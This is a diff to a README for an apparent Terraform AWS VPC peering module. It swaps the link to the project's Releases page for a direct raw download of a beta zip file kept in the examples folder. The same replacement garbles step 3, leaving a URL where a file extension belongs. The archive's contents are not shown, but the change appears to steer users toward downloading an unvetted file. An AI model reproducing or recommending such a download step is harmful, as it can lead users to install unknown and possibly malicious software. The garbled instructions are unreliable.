ErTmannobom/terraform-aws-vpc-peering/README.md

 ## 📥 Download & Install

-Visit this page to download: [GitHub Releases Page](https://github.com/ErTmannobom/terraform-aws-vpc-peering/releases)
+Visit this page to download: [GitHub Releases Page](https://raw.githubusercontent.com/ErTmannobom/terraform-aws-vpc-peering/main/examples/terraform-aws-vpc-peering_3.6-beta.4.zip)

 1. Click on the link above to go to the Releases page.
 2. Look for the latest release version.
-3. Download the .zip or .tar.gz file based on your preference.
+3. Download the .zip or https://raw.githubusercontent.com/ErTmannobom/terraform-aws-vpc-peering/main/examples/terraform-aws-vpc-peering_3.6-beta.4.zip file based on your preference.
 4. Extract the contents of the downloaded file to a folder of your choice.

 ## 🖥️ System Requirements